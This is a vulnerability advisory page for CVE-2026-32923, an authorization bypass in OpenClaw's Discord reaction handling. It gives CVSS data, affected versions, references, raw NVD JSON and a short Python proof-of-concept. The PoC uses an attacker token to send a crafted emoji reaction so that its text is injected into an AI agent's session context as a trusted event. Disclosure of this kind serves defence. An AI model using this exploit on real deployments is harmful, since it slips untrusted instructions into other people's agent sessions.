Security Vulnerability Report
CVE-2026-32923 CVSS 5.4 MEDIUM

CVE-2026-32923

Published: 2026-03-29 13:17:01
Last Modified: 2026-03-31 18:01:13

Description

OpenClaw before 2026.3.11 contains an authorization bypass vulnerability in Discord guild reaction ingestion that fails to enforce member users and roles allowlist checks. Non-allowlisted guild members can trigger reaction events accepted as trusted system events, injecting reaction text into downstream session context.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-32923: OpenClaw Authorization Bypass
# This script demonstrates how a non-allowlisted guild member
# can trigger a reaction event that bypasses the allowlist check.
import requests


def exploit_openclaw(guild_id, channel_id, message_id, attacker_token, emoji_payload):
    """
    Simulates sending a Discord reaction to trigger the vulnerability.
    """
    # Discord API endpoint for adding a reaction
    url = f"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}/reactions/{emoji_payload}/@me"
    headers = {
        "Authorization": attacker_token,
        "Content-Type": "application/json"
    }
    try:
        # Step 1: Attacker sends a reaction to a message
        response = requests.put(url, headers=headers)
        if response.status_code == 204:
            print("[+] Reaction sent successfully.")
            print("[+] OpenClaw < 2026.3.11 may ingest this as a trusted system event.")
            print(f"[+] Payload '{emoji_payload}' potentially injected into session context.")
            return True
        else:
            print(f"[-] Failed to send reaction. Status code: {response.status_code}")
            return False
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False


# Example Usage
if __name__ == "__main__":
    # Replace with actual target details
    TARGET_GUILD = "123456789"
    TARGET_CHANNEL = "987654321"
    TARGET_MESSAGE = "111111111"
    ATTACKER_TOKEN = "ATTACKER_BOT_TOKEN_HERE"
    # The emoji name acts as the payload text
    PAYLOAD = "malicious_emoji_name"
    exploit_openclaw(TARGET_GUILD, TARGET_CHANNEL, TARGET_MESSAGE, ATTACKER_TOKEN, PAYLOAD)

References

https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp (Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-guild-reaction-allowlist-enforcement (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32923", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:00.767", "lastModified": "2026-03-31T18:01:13.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.11 contains an authorization bypass vulnerability in Discord guild reaction ingestion that fails to enforce member users and roles allowlist checks. Non-allowlisted guild members can trigger reaction events accepted as trusted system events, injecting reaction text into downstream session context."}, {"lang": "es", "value": "OpenClaw anterior a 2026.3.11 contiene una vulnerabilidad de omisión de autorización en la ingesta de reacciones de gremios de Discord que no aplica las comprobaciones de lista blanca de usuarios y roles de miembros. Los miembros del gremio no incluidos en la lista blanca pueden desencadenar eventos de reacción aceptados como eventos de sistema de confianza, inyectando texto de reacción en el contexto de sesión posterior."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.11", "matchCriteriaId": "4B01F0B5-B0CB-462E-A546-2BA2CACD83D5"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-guild-reaction-allowlist-enforcement", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}